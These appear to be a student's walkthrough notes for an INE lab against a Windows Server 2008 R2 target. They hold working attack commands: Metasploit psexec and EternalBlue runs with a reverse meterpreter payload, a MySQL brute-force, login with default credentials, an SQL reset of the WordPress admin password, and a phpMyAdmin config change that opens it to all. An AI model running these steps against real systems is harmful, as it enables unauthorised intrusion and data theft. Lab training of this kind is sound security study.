Obtain the target IP address from the /etc/hosts file
cat /etc/hosts
10.2.29.246 demo.ine.local
ping 10.2.29.246
ping demo.ine.local
cd Desktop
mkdir Win2k8
cd WiWin2k8/ # To store all the notes and files about the target
Port scanning with nmap
nmap -sV 10.2.29.246
# Scans 1000 common ports
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
4848/tcp open ssl/http Oracle Glassfish Application Server
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp open wap-wsp?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Perform an advanced nmap scan and export it into an xml file
nmap -T4 -PA -sC -sV -p 1-10000 10.2.29.246 -oX nmap_10k
# -T4 = Aggressive speed scan
# -PA = TCP ACK discovery
# -sC = default NSE scripts
# -sV = service version detection
# -p 1-10000 = ports range
# -oX = XML output file
# A full port range scan can be also done, not necessary here
# nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_all
ssh vagrant@10.2.16.83
# vagrant:vagrant
# WORKS!
ssh administrator@10.2.16.83
# administrator:vagrant
# DOES NOT work!
net localgroup administrators
# "vagrant" is in the Administrators Group
Obtain a Meterpreter session
msfconsole
use auxiliary/scanner/ssh/ssh_login
setg RHOST 10.2.16.83
setg RHOSTS 10.2.16.83
set USERNAME vagrant
set PASSWORD vagrant
run
session 1
# CTRL+Z to background
sessions -u 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
# The manual msfvenom payload upload can be tried
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS 10.2.26.45
set SMBUser Administrator
set SMBPass vagrant
set payload windows/x64/meterpreter/reverse_tcp
run
If no account credentials can be found, use the EternalBlue vulnerability exploit since the system target is a Win Server 2008 R2
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 10.2.26.45
run
MySQL
nmap -sV -sC -p 3306,8585 10.2.26.45
3306/tcp open mysql MySQL 5.5.20-log
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
Search for MySQL exploits
searchsploit MySQL 5.5
# There are only Privilege Escalation exploits
Brute-force MySQL
msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'
📌 root password is empty
mysql -u root -p -h 10.2.26.45
show databases;
use wordpress;
show tables;
select * from wp_users;
Change admin WordPress user's password
❗ DO NOT Change passwords in a real pentest
UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
Access via browser
http://10.2.26.45:8585/wordpress/wp-admin
Try to gain access to phpMyAdmin using MSF
Access the target through SMB and modify phpMyAdmin configuration file
# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run
sysinfo
Move into the wamp folder
cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php
Change WordPress admin password
cd C:\\wamp\\alias
download phpmyadmin.conf
# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
Allow from all
# Write and close
# In the MSFconsole
upload phpmyadmin.conf
# Apache service must be restarted
shell
net stop wampapache
net start wampapache
Access phpMyAdmin
http://10.2.26.45:8585/phpmyadmin/
it automatically logs in since the root password is null